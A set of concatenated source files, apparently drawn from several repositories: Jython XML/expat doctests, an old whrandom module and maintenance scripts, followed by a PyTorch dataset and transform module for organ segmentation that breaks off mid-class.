http://www.python.org|a = u'1'
http://www.python.org|sub1
sub2
"""
def test_unicode_bug():
"""
Regression introduced by revision 28
>>> doc = XML("<doc>舰</doc>")
>>> doc.text
u'\u8230'
"""
def test_DTD():
"""
>>> xml = '''<!DOCTYPE doc [
... <!ELEMENT doc (any|empty|text|mixed|opt|many|plus)>
... <!ELEMENT any ANY>
... <!ELEMENT empty EMPTY>
... <!ELEMENT text (#PCDATA)>
... <!ELEMENT sequence (_sequence)>
... <!ELEMENT _sequence (any,any)>
... <!ELEMENT mixed (#PCDATA|any)*>
... <!ELEMENT opt (empty)?>
... <!ELEMENT many (empty)*>
... <!ELEMENT plus (empty)+>
... ]>
... <doc><text>content</text></doc>
... '''
>>> parser = expat.ParserCreate()
>>> def handler(header, *args):
... def _handler(*args):
... print header + ":", args
... return _handler
>>> parser.ElementDeclHandler = handler("ELEMENT")
>>> parser.AttlistDeclHandler = handler("ATTRIBUTE")
>>> parser.EntityDeclHandler = handler("ENTITY")
>>> parser.NotationDeclHandler = handler("NOTATION")
>>> parser.UnparsedEntityDeclHandler = handler("UNPARSED")
>>> parser.Parse(xml, True)
ELEMENT: (u'doc', (5, 0, None, ((4, 0, u'any', ()), (4, 0, u'empty', ()), (4, 0, u'text', ()), (4, 0, u'mixed', ()), (4, 0, u'opt', ()), (4, 0, u'many', ()), (4, 0, u'plus', ()))))
ELEMENT: (u'any', (2, 0, None, ()))
ELEMENT: (u'empty', (1, 0, None, ()))
ELEMENT: (u'text', (3, 0, None, ()))
ELEMENT: (u'sequence', (6, 0, None, ((4, 0, u'_sequence', ()),)))
ELEMENT: (u'_sequence', (6, 0, None, ((4, 0, u'any', ()), (4, 0, u'any', ()))))
ELEMENT: (u'mixed', (3, 2, None, ((4, 0, u'any', ()),)))
ELEMENT: (u'opt', (6, 1, None, ((4, 0, u'empty', ()),)))
ELEMENT: (u'many', (6, 2, None, ((4, 0, u'empty', ()),)))
ELEMENT: (u'plus', (6, 3, None, ((4, 0, u'empty', ()),)))
1
"""
def test_entity():
"""
TODO: need a fallback for entity-resolver so that empty source is returned.
>>> xml = ''' <!DOCTYPE doc SYSTEM "external.dtd" [
... <!ENTITY ext-entity SYSTEM "external-entity">
... ]>
... <doc>&ext-entity;&in-ext-dtd-entity;</doc>'''
>>> parser = expat.ParserCreate()
>>> parser.Parse(xml, True)
1
EXPAT OH MY ! When applicable (internal entities), the CharacterDataHandler
callback will override DefaultHandlerExpand, but it WON'T override
DefaultHandler. On the other hand, the DefaultHandlerExpand callback WILL
override DefaultHandler ... More tests todo here ...
>>> xml = '''<!DOCTYPE doc SYSTEM "external.dtd" [
... <!ENTITY ext-entity SYSTEM "external-entity">
... <!ENTITY int-entity "internal">
... ]>
... <doc>&int-entity;&ext-entity;&in-ext-dtd-entity;</doc>'''
>>> parser = expat.ParserCreate()
>>> def handler(header):
... def _handler(*args):
... print header + ":", args
... return 1
... return _handler
>>> parser.CharacterDataHandler = handler("text")
>>> parser.DefaultHandler = handler("default")
>>> parser.Parse(xml, True) #doctest: +ELLIPSIS
default: ...
default: (u'&int-entity;',)
default: (u'&ext-entity;',)
default: (u'&in-ext-dtd-entity;',)
...
1
EXPAT OH MY ! When applicable (internal entities), the CharacterDataHandler
callback will override DefaultHandlerExpand, but it WON'T override
DefaultHandler. On the other hand, the DefaultHandlerExpand callback WILL
override DefaultHandler ... More tests todo here ...
"""
def test_resolve_entity_handlers():
"""
>>> xml = '''<!DOCTYPE doc [
... <!ENTITY entity SYSTEM "entity">
... ]>
... <doc>&entity;</doc>'''
>>> def handler(header):
... def _handler(*args):
... print header + ":", args
... return 1
... return _handler
>>> parser = expat.ParserCreate()
>>> parser.ExternalEntityRefHandler = handler("ExternalEntityRefHandler")
>>> parser.Parse(xml, True)
ExternalEntityRefHandler: (u'entity', None, u'entity', None)
1
"""
def handler(name, header="XML>", returns=None):
def _handler(*args):
if len(args) == 1:
args = "(%r)" % args[0]
else:
args = str(args)
print header, name + "%s" % args
return returns
return _handler
def parse(xml, *handlers):
parser = expat.ParserCreate()
for name in handlers:
if name == "ExternalEntityRefHandler":
returns = 1
else:
returns = None
setattr(parser, name, handler(name, returns=returns))
parser.Parse(xml, True)
def test_internal_entities():
"""
>>> xml = '''<!DOCTYPE doc [
... <!ENTITY entity "entity-content">
... ]>
... <doc>&entity;</doc>'''
>>> parse(xml)
>>> parse(xml, "CharacterDataHandler")
XML> CharacterDataHandler(u'entity-content')
>>> parse(xml, "DefaultHandler") #doctest: +ELLIPSIS
XML> ...DefaultHandler(u'&entity;')...
>>> parse(xml, "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...DefaultHandlerExpand(u'entity-content')...
# Uhu ?
>>> parse(xml, "CharacterDataHandler",
... "DefaultHandler") #doctest: +ELLIPSIS
XML> ...DefaultHandler(u'&entity;')...
>>> parse(xml, "CharacterDataHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...CharacterDataHandler(u'entity-content')...
>>> parse(xml, "DefaultHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...DefaultHandlerExpand(u'entity-content')...
>>> parse(xml, "CharacterDataHandler",
... "DefaultHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...CharacterDataHandler(u'entity-content')...
"""
def test_external_entities():
"""
>>> xml = '''<!DOCTYPE doc [
... <!ENTITY entity PUBLIC "http://entity-web" "entity-file">
... ]>
... <doc>&entity;</doc>'''
>>> parse(xml)
>>> parse(xml, "ExternalEntityRefHandler")
XML> ExternalEntityRefHandler(u'entity', None, u'entity-file', u'http://entity-web')
>>> parse(xml, "DefaultHandler") #doctest: +ELLIPSIS
XML> ...DefaultHandler(u'&entity;')...
>>> parse(xml, "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...DefaultHandlerExpand(u'&entity;')...
>>> parse(xml, "ExternalEntityRefHandler",
... "DefaultHandler") #doctest: +ELLIPSIS
XML> ...ExternalEntityRefHandler(u'entity', None, u'entity-file', u'http://entity-web')...
>>> parse(xml, "ExternalEntityRefHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...ExternalEntityRefHandler(u'entity', None, u'entity-file', u'http://entity-web')...
>>> parse(xml, "DefaultHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...DefaultHandlerExpand(u'&entity;')...
>>> parse(xml, "ExternalEntityRefHandler",
... "DefaultHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...ExternalEntityRefHandler(u'entity', None, u'entity-file', u'http://entity-web')...
"""
def test_undefined_entities():
"""
>>> xml = "<doc>&entity;</doc>"
>>> parse(xml)
Traceback (most recent call last):
...
ExpatError: undefined entity: line 1, column 5
"""
def locate(parser, name):
def _handler(*args):
print name, parser.CurrentLineNumber, parser.CurrentColumnNumber
return _handler
def test_current_location():
"""
>>> xml = '''<doc>text<tag/>text<tag></tag>
... <tag></tag>
... text<tag/>
... </doc>'''
>>> parser = expat.ParserCreate()
>>> parser.CharacterDataHandler = locate(parser, "TEXT:")
>>> parser.StartElementHandler = locate(parser, "START:")
>>> parser.EndElementHandler = locate(parser, "END:")
>>> _ = parser.Parse(xml, True) #doctest: +ELLIPSIS
START: 1 0
TEXT: 1 5...
START: 1 9
END: 1 15
TEXT: 1 15...
START: 1 19
END: 1 24
TEXT: 1 30...
START: 2 0
END: 2 5
TEXT: 2 11...
START: 3 4
END: 3 10
TEXT: 3 10...
END: 4 0
>>> xml = '''<doc>
... start tag after some text<tag/>
... <elt></elt><tag/>
... <elt/><tag/>
... </doc>'''
>>> parser = expat.ParserCreate()
>>> parser.CharacterDataHandler = locate(parser, "TEXT:")
>>> parser.StartElementHandler = locate(parser, "START:")
>>> parser.EndElementHandler = locate(parser, "END:")
>>> _ = parser.Parse(xml, True) #doctest: +ELLIPSIS
START: 1 0
TEXT: 1 5...
START: 2 25
END: 2 31
TEXT: 2 31...
START: 3 0
END: 3 5
START: 3 11
END: 3 17
TEXT: 3 17...
START: 4 0
END: 4 6
START: 4 6
END: 4 12
TEXT: 4 12...
END: 5 0
"""
def test_error_location():
"""
Source: selftest.py, ElementTree 1.3a3
Changes: removed dependencies in ElementTree, added one extra test
>>> def error(xml):
... p = expat.ParserCreate()
... try:
... p.Parse(xml, True)
... except expat.ExpatError, e:
... return e.lineno, e.offset
>>> error("foo")
(1, 0)
>>> error("<tag>&foo;</tag>")
(1, 5)
>>> error("foobar<")
(1, 6)
>>> error("<doc>text<doc")
(1, 9)
"""
@jython
def test_resolveEntity():
"""
# TODO: test that 'skipEntity' works.
>>> # Jython
>>> from org.python.core.util import StringUtil
>>> from jarray import array
>>> # Java Standard Edition
>>> from org.xml.sax import *
>>> from org.xml.sax.ext import *
>>> from org.xml.sax.helpers import *
>>> from java.io import ByteArrayInputStream
>>> xml = '''<!DOCTYPE doc
... [<!ENTITY entity SYSTEM "entity-file">
... ]>
... <doc>&entity;</doc>
... '''
>>> def empty_source():
... _source = InputSource()
... byte_stream = ByteArrayInputStream(array([], "b"))
... _source.setByteStream(byte_stream)
... return _source
>>> class Handler(EntityResolver2):
... def getExternalSubset(self, name, baseURI):
... return None
... def resolveEntity(self, name, publicId, baseURI, systemId):
... print "Entity name:", name
... return empty_source()
>>> def main():
... sax_parser = "org.apache.xerces.parsers.SAXParser"
... reader = XMLReaderFactory.createXMLReader(sax_parser)
... entity_resolver2 = "http://xml.org/sax/features/use-entity-resolver2"
... enabled = reader.getFeature(entity_resolver2)
... print "Entity-Resolver2 enabled:", enabled
... handler = Handler()
... reader.setEntityResolver(handler)
... bytes = StringUtil.toBytes(xml)
... byte_stream = ByteArrayInputStream(bytes)
... source = InputSource(byte_stream)
... reader.parse(source)
>>> main()
Entity-Resolver2 enabled: True
Entity name: entity
"""
def test_close_file_iss1479():
# http://bugs.jython.org/issue1479
"""
>>> import os
>>> from test import test_support
>>> from xml.etree import ElementTree as ET
>>> ET.ElementTree(ET.XML('<test/>')).write(test_support.TESTFN)
>>> os.remove(test_support.TESTFN)
>>> fp = open(test_support.TESTFN, 'w')
>>> fp.write('<test/>')
>>> fp.close()
>>> tree = ET.parse(test_support.TESTFN)
>>> os.remove(test_support.TESTFN)
"""
def test_close_file_iss2413():
# http://bugs.jython.org/issue2413
"""
>>> import os
>>> from test import test_support
>>> from xml.etree import ElementTree as ET
>>> tree = ET.ElementTree(ET.XML('<test/>'))
>>> tree.write(test_support.TESTFN, encoding='an_unknown_encoding')
Traceback (most recent call last):
LookupError: unknown encoding 'an_unknown_encoding'
>>> os.remove(test_support.TESTFN)
"""
def test_main():
from test import test_xml_etree_jy
test_support.run_doctest(test_xml_etree_jy)
if __name__ == "__main__":
doctest.testmod()
```
#### File: Lib/test/whrandom.py
```python
class whrandom:
#
# Initialize an instance.
# Without arguments, initialize from current time.
# With arguments (x, y, z), initialize from them.
#
def __init__(self, x = 0, y = 0, z = 0):
self.seed(x, y, z)
#
# Set the seed from (x, y, z).
# These must be integers in the range [0, 256).
#
def seed(self, x = 0, y = 0, z = 0):
if not type(x) == type(y) == type(z) == type(0):
raise TypeError, 'seeds must be integers'
if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256):
raise ValueError, 'seeds must be in range(0, 256)'
if 0 == x == y == z:
# Initialize from current time
import time
t = long(time.time() * 256)
t = int((t&0xffffff) ^ (t>>24))
t, x = divmod(t, 256)
t, y = divmod(t, 256)
t, z = divmod(t, 256)
# Zero is a poor seed, so substitute 1
self._seed = (x or 1, y or 1, z or 1)
#
# Get the next random number in the range [0.0, 1.0).
#
def random(self):
x, y, z = self._seed
#
x = (171 * x) % 30269
y = (172 * y) % 30307
z = (170 * z) % 30323
#
self._seed = x, y, z
#
return (x/30269.0 + y/30307.0 + z/30323.0) % 1.0
#
# Get a random number in the range [a, b).
#
def uniform(self, a, b):
return a + (b-a) * self.random()
#
# Get a random integer in the range [a, b] including both end points.
#
def randint(self, a, b):
return a + int(self.random() * (b+1-a))
#
# Choose a random element from a non-empty sequence.
#
def choice(self, seq):
return seq[int(self.random() * len(seq))]
# Initialize from the current time
#
_inst = whrandom()
seed = _inst.seed
random = _inst.random
uniform = _inst.uniform
randint = _inst.randint
choice = _inst.choice
```
#### File: jython-whinchat/Misc/genpatches.py
```python
from StringIO import StringIO
import os.path
import subprocess
import sys
import shutil
def get_modules(path):
modules = set()
for dirpath, dirnames, filenames in os.walk(path):
for filename in filenames:
if filename.endswith('.py'):
cutoff = len(path) + 1
fullpath = os.path.join(dirpath[cutoff:], filename)
modules.add(fullpath)
return modules
if not os.path.exists('lib-python'):
print >>sys.stderr, 'You need to run this script from the Jython root directory.'
sys.exit(1)
if not os.path.exists('../cpython'):
print >>sys.stderr, 'You need to have the CPython clone in ../cpython.'
sys.exit(1)
jymodules = get_modules(u'Lib')
cpymodules = get_modules(u'lib-python')
cpy25modules = get_modules(u'../cpython/Lib')
common_modules = jymodules.intersection(cpy25modules).intersection(cpymodules)
# Run mercurial to get the changesets where each file was last synced with CPython stdlib
print 'Parsing mercurial logs for the last synchronized changesets'
changesets = {}
for mod in common_modules:
path = 'Lib/' + mod
pipe = subprocess.Popen(['hg', 'log', '-v', path], stdout=subprocess.PIPE)
stdoutdata, stderrdata = pipe.communicate()
if pipe.returncode != 0:
print >>sys.stderr, stderrdata
sys.exit(1)
buf = StringIO(stdoutdata)
changeset = None
found = False
iterator = iter(list(buf))
for line in iterator:
if line.startswith('changeset:'):
changeset = line.split(':')[1].strip()
if line.startswith('description:'):
for descline in iterator:
if descline == '\n':
break
if 'svn.python.org' in descline:
found = True
break
if found:
break
if not found:
print >>sys.stderr,'No sync changeset found for %s' % path
else:
changesets[path] = changeset
if os.path.exists('patches'):
shutil.rmtree('patches')
os.mkdir('patches')
print 'Generating patches'
for path, changeset in changesets.iteritems():
patchname = 'patches/%s.patch' % path[4:]
patch_dir = os.path.dirname(patchname)
if not os.path.exists(patch_dir):
os.makedirs(patch_dir)
retcode = os.system('hg diff -r {} {} > {}'.format(changeset, path, patchname))
if retcode != 0:
print >>sys.stderr, "Error creating patch for %s" % path
sys.exit(3)
print 'All done. You can now run applypatches.py to update and patch the modules.'
```
#### File: jython-whinchat/Misc/jython_checker.py
```python
import sys
def usage():
print 'Usage: jython jython_checker.py <module name created by make_checker>'
sys.exit(1)
if not len(sys.argv) == 2:
usage()
checker_name = sys.argv[1].split('.')[0]#pop off the .py if needed
try:
checker = __import__(checker_name)
except:
print 'No module "%s" found' % checker_name
usage()
import make_checker
ignored_types = ['frame',
'code',
'traceback']
checks = []
for check in checker.checks:
index, expected_type, expected_bases, expected_dict = check
if checker.names[index] in ignored_types:
print 'Skipping', checker.names[index]
continue
checks.append(check)
ignored_members = ['__getattribute__', '__doc__']
ok, missing, bad_type, different = make_checker.do_check(checker.names, checks)
def strip_ignored(differences, key, ignored):
if not key in differences:
return
problems = differences[key]
for member in ignored_members:
if member in problems:
problems.remove(member)
for t, name, differences in different:
strip_ignored(differences, 'missing', ignored_members)
strip_ignored(differences, 'extras', ignored_members)
make_checker.report(ok, missing, bad_type, different)
```
#### File: jython-whinchat/Misc/make_cmath_testcases.py
```python
import math
import mpmath
# Table of additional real test cases. The layout is
#
# function : ( starting_number [ x1, x2, x3, ... ] ),
#
# Where tests will be numbered functionNNNN and each xn
# generates a new test with (complex) argument xn + 0j.
cases_to_generate = {
'atan' : ( 400, [
float.fromhex('0x1.fffffffffffffp1023'),
float.fromhex('-0x1.fffffffffffffp1023'),
1e-17, -1e-17, 1e-4, -1e-4,
1 - 1e-15, 1 + 1e-15,
14.101419947171719, # tan(1.5)
1255.7655915007896, # tan(1.57)
]),
'cos' : ( 50, [
1e-150, 1e-18, 1e-9, 0.0003, 0.2, 1.0,
-1e-18, -0.0003, -1.0,
1.0471975511965977, # -> 0.5
2.5707963267948966,
-2.5707963267948966,
18, 18.0
]),
'cosh' : ( 50, [
1e-150, 1e-18, 1e-9, 0.0003, 0.2, 1.0,
-1e-18, -0.0003, -1.0,
1.3169578969248167086, # -> 2.
-1.3169578969248167086,
25*math.log(2), # cosh != exp at 52 bits
27*math.log(2), # cosh == exp at 52 bits
709.7827, # not quite overflow
-709.7827, # not quite overflow
]),
'exp' : ( 70, [
1e-8, 0.0003, 0.2, 1.0,
-1e-8, -0.0003, -1.0,
2**-52, -2**-53, # exp != 1 (just)
2.3025850929940457, # -> 10
-2.3025850929940457,
709.7827, # not quite overflow
]),
'sin' : ( 50, [
1e-100, 3.7e-8, 0.001, 0.2, 1.0,
-3.7e-8, -0.001, -1.0,
0.5235987755982989, # -> 0.5
-0.5235987755982989,
2.617993877991494365,
-2.617993877991494365,
]),
'sinh' : ( 50, [
1e-100, 5e-17, 1e-16, 3.7e-8, 0.001, 0.2, 1.0,
-3.7e-8, -0.001, -1.0,
1.44363547517881034, # -> 2.
-1.44363547517881034,
25*math.log(2), # sinh != exp at 52 bits
27*math.log(2), # sinh == exp at 52 bits
709.7827, # not quite overflow
-709.7827, # not quite overflow
]),
'tan' : ( 50, [
1e-100, 3.7e-8, 0.001, 0.2, 1.0,
-3.7e-8, -0.001, -1.0,
0.463647609000806116, # -> 0.5
-0.463647609000806116,
1.1071487177940905, # -> 0.5
-1.1071487177940905,
1.5,
1.57,
math.pi/2 - 2**-51,
]),
'tanh' : ( 50, [
1e-100, 5e-17, 1e-16, 3.7e-8, 0.001, 0.2, 1.0,
-3.7e-8, -0.001, -1.0,
0.54930614433405484, # -> 0.5
-0.54930614433405484,
25*math.log(2), # sinh != cosh at 52 bits
27*math.log(2), # sinh == cosh at 52 bits
711, # oveflow cosh in naive impl
1.797e+308, # risk overflow
]),
'sqrt' : ( 150, [
float.fromhex('0x1.fffffffffffffp1023'),
float.fromhex('0x1.0p-1022'),
float.fromhex('0x0.0000000000001p-1022'),
]),
}
def generate_cases() :
fmt = "{}{:04d} {} {!r} 0.0 -> {} {!r}"
for fn in sorted(cases_to_generate.keys()):
print "-- Additional real values (Jython)"
count, xlist = cases_to_generate[fn]
for x in xlist:
# Compute the function (in the reference library)
func = getattr(mpmath, fn)
y = func(x)
# For the benefit of cmath tests, get the sign of imaginary zero right
zero = 0.0
if math.copysign(1., x) > 0.:
if fn=='cos' :
zero = -0.0
else :
if fn=='cosh' :
zero = -0.0
# Output one test case at sufficient precision
print fmt.format(fn, count, fn, x, mpmath.nstr(y, 20), zero )
count += 1
def test_main():
with mpmath.workprec(100):
generate_cases()
if __name__ == '__main__':
test_main()
# Conveniences for interactive use
from mpmath import mp, mpf, workprec, workdps, nstr
```
#### File: animal/reptile/snake.py
```python
import croc
class Snake:
def eats(self, thing):
return False
class Python(Snake):
def eats(self, thing):
return isinstance(thing, croc.Gavial)
```
|
{
"source": "jeff7021/organseg_dags",
"score": 3
}
|
#### File: organseg_dags/cacheio/Dataset.py
```python
import hashlib
import pickle
import collections
from copy import deepcopy
from pathlib import Path
from abc import ABC, abstractmethod
from typing import Any, Optional, Callable, Sequence, Union, Dict, Tuple, Hashable, Mapping
import torch
import numpy as np
import nibabel as nib
from scipy.ndimage import rotate
from torch.utils.data import Dataset as _TorchDataset
MAX_SEED = np.iinfo(np.uint).max + 1 # 2**32
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None, progress: bool = True) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
progress: whether to display a progress bar.
"""
self.data = data
self.transform = transform
self.progress = progress
def __len__(self) -> int:
return len(self.data)
def __getitem__(self, index: int):
data_ = self.data[index]
if self.transform is not None:
data_ = apply_transform(self.transform, data_)
return data
class Randomizable(ABC):
"""
An interface for handling random state locally, currently based on a class variable `R`,
which is an instance of `np.random.RandomState`.
"""
R: np.random.RandomState = np.random.RandomState()
def set_random_state(
self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
) -> "Randomizable":
if seed is not None:
_seed = id(seed) if not isinstance(seed, (int, np.integer)) else seed
_seed = _seed % MAX_SEED # _seed must be in [0, MAX_SEED - 1] for uint32
self.R = np.random.RandomState(_seed)
return self # for method cascading
if state is not None:
if not isinstance(state, np.random.RandomState):
raise TypeError(f"state must be None or a np.random.RandomState but is {type(state).__name__}.")
self.R = state
return self
self.R = np.random.RandomState()
return self
@abstractmethod
def randomize(self, data: Any) -> None:
raise NotImplementedError(f"Subclass {self.__class__.__name__} must implement this method.")
class Transform(ABC):
@abstractmethod
def __call__(self, data: Any):
raise NotImplementedError(f"Subclass {self.__class__.__name__} must implement this method")
class RandomizableTransform(Randomizable, Transform):
def __init__(self, prob=1.0, do_transform=False):
self._do_transform = do_transform
self.prob = min(max(prob, 0.0), 1.0)
def randomize(self, data: Any) -> None:
self._do_transform = self.R.rand() < self.prob
class Compose:
def __init__(self, transforms: Union[Sequence[Callable], Callable]) -> None:
if transforms is None:
transforms = ()
self.transforms = ensure_tuple(transforms)
def __call__(self, input_):
for _transform in self.transforms:
input_ = _transform(input_) # avoid naming conflicts
return input_
def apply_transform(transform: Callable, data, map_items: bool = True):
try:
if isinstance(data, (list, tuple)) and map_items:
return [transform(item) for item in data]
return transform(data)
except Exception as e:
raise RuntimeError(f"applying transform {transform}") from e
def pickle_hashing(item, protocol=pickle.HIGHEST_PROTOCOL) -> bytes:
# NOTE: Sort the item using the same key function so that dicts that
# have the same key-value pairs can produce a consistent hash value.
cache_key = hashlib.md5(pickle.dumps(sorted_dict(item), protocol=protocol)).hexdigest() # encode a hash value using the hash algorithm (message digest 5, MD5)
return f"{cache_key}".encode("utf-8")
def sorted_dict(item, key=None, reverse=False):
"""Return a new sorted dictionary from the `item`."""
if not isinstance(item, dict):
return item
return {k: sorted_dict(v) if isinstance(v, dict) else v for k, v in sorted(item.items(), key=key, reverse=reverse)} # item may be a list of dicts
def ensure_tuple(vals: Any) -> Tuple[Any, ...]:
"""Return a tuple of `vals`"""
if not isinstance(vals, collections.abc.Iterable) or isinstance(vals, str): # not an iterable instance or is an iterable instance but is an instance of `str`
vals = (vals, )
return tuple(vals)
def normalize_foreground(img, label):
nonzero_label = np.where(label>0, 1, 0)
mean = np.sum(img * nonzero_label) / np.prod(nonzero_label.shape)
std = np.sqrt(np.sum(np.square(img - mean) * nonzero_label) / np.prod(nonzero_label.shape))
img = (img - mean) / std
return img
class PersistentDataset(Dataset):
"""
Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data,
it can operate transforms for specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
the `cache_dir` before applying the remaining random dependant transforms
[RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
followed by applying the random dependant parts of transform processing.
Note:
The input data must be a list of file paths and will hash them as cache keys.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]] = None,
hash_func: Callable[..., bytes] = pickle_hashing,
progress: bool = True,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
progress: whether to display a progress bar.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform, progress=progress)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
if self.cache_dir is not None:
if not self.cache_dir.exists(): # is_file and is_dir
self.cache_dir.mkdir(parents=True)
if not self.cache_dir.is_dir(): # is_dir
raise ValueError("cache_dir must be a directory.")
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms: # self.transform is an instance of Compose
# execute all the deterministic transforms
if isinstance(_transform, RandomizableTransform) or not isinstance(_transform, Transform):
break
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, RandomizableTransform)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True # indicate that all transforms will be processed
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed: Mapping[Hashable, str]):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
cache is ONLY dependant on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt" # save the pre-transformed data using .pt file extension
if hashfile is not None and hashfile.is_file(): # cache hit
return torch.load(hashfile)
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed, because it is reused in every epoch.
if hashfile is not None:
# NOTE: Writing to ".temp_write_cache" and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
temp_hash_file = hashfile.with_suffix(".temp_write_cache")
torch.save(_item_transformed, temp_hash_file)
temp_hash_file.rename(hashfile)
return _item_transformed
def __getitem__(self, index: int):
pre_random_item = self._cachecheck(self.data[index]) # make sure data is pre-transformed and cached
return self._post_transform(pre_random_item)
class RegularDataset(Dataset):
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable]):
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data, transform)
def __getitem__(self, ind: int):
d = self.data[ind]
for _transform in self.transform.transforms: # self.transform is an instance of `Compose`
d = apply_transform(_transform, d) # process all the rest of transforms
return d
class LoadImage(Transform):
"""
Dictionary-based loading image
"""
def __init__(
self,
keys: Sequence[str],
dtype: np.dtype = np.float32) -> None:
self.keys = keys
self.dtype = dtype
def __call__(
self,
data: Mapping[Hashable, str]) -> np.ndarray:
d = dict(data)
for key in self.keys:
d_tmp = nib.load(d[key]).get_data()
# flip to align orientation. See great performance gain.
# Key design of the second group of experiments.
if 'tcia' in d[key]:
d_tmp = d_tmp[:, :, ::-1]
d[key] = d_tmp.astype(self.dtype)
return d
class Clip(Transform):
"""
Dictionary-base intensity clip
"""
def __init__(
self,
keys: Sequence[str],
min: float,
max: float,) -> None:
self.keys = keys
self.min = min
self.max = max
def __call__(self, data: Mapping[Hashable, np.ndarray]) -> Dict[Hashable, np.ndarray]:
d = dict(data)
for key in self.keys:
d[key] = np.clip(data[key], self.min, self.max) # functionality
return d
class ForeNormalize(Transform):
"""
Dictionary-based intensity normalization
"""
def __init__(
self,
keys: Sequence[str],
mask_key: str) -> None:
self.keys = keys
self.mask_key = mask_key
self.norm = normalize_foreground # functionality
def __call__(self, data: Mapping[Hashable, np.ndarray]) -> Dict[Hashable, np.ndarray]:
d = dict(data)
for key in self.keys:
d[key] = self.norm(data[key], data[self.mask_key])
return d
class RandFlip(RandomizableTransform):
"""
Dictionary-based random flip
"""
def __init__(
self,
keys: Sequence[str],
prob: float = 0.5,
spatial_axis: Optional[Sequence[int]] = (0, 1),
) -> None:
super().__init__(prob)
self.keys = keys
self.spatial_axis = spatial_axis
def __call__(self, data: Mapping[Hashable, np.ndarray]) -> Dict[Hashable, np.ndarray]:
super().randomize(None)
d = dict(data)
if self._do_transform:
flip_axis = np.random.choice(self.spatial_axis)
for key in self.keys:
d[key] = np.flip(data[key], axis=flip_axis) # functionality
return d
class RandRotate(RandomizableTransform):
"""
Dictionary-based random rotation
"""
def __init__(
self,
keys: Sequence[str],
interp_order: Sequence[int],
angle: Optional[float] = 15.0,
prob: Optional[float] = 0.5,
) -> None:
super().__init__(prob)
self.keys = keys
self.interp_order = interp_order
self.angle = angle
